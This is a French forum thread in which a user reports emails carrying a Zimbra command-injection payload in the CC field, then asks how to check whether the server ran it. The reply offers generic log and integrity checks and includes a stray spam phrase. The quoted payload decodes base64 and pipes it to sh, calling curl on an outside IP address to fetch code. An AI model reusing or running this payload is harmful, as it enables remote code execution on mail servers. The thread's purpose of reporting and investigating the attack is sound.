Free - Messagerie et hébergement > Messagerie : compte, Webmail, Zimbra, newsgroup, gros fichiers
[Attaque ZIMBRA] J'ai reçu un mail contenant un script sh dans destinataire CC
(1/1)
rospionne:
Bonjour,
J'ai reçu 4 mails contenant dans le champ CC un code bizard (Veuillez ne pas exécuter ce code, risque viral fort) :
--- Code: ---CC: ppp`echo${IFS}Li4vLi4vY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`[email protected],ppp`echo${IFS}L29wdC96aW1icmEvY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`[email protected]
--- Fin du code ---
Comment savoir si le serveur Zimbra a exécuter ou non ce genre de code ?
Merci d'avance.
primagenike:
Bonjour,
geometry dashPour savoir si le serveur Zimbra a exécuté ce code, vous devez vérifier les journaux du serveur. Recherchez des entrées suspectes liées à des commandes shell (sh) ou des décryptages base64. Il serait également judicieux de vérifier l'intégrité des fichiers système et de surveiller les processus en cours. Enfin, effectuez une analyse antivirus pour détecter d'éventuelles infections.
Merci.
Navigation
Utiliser la version classique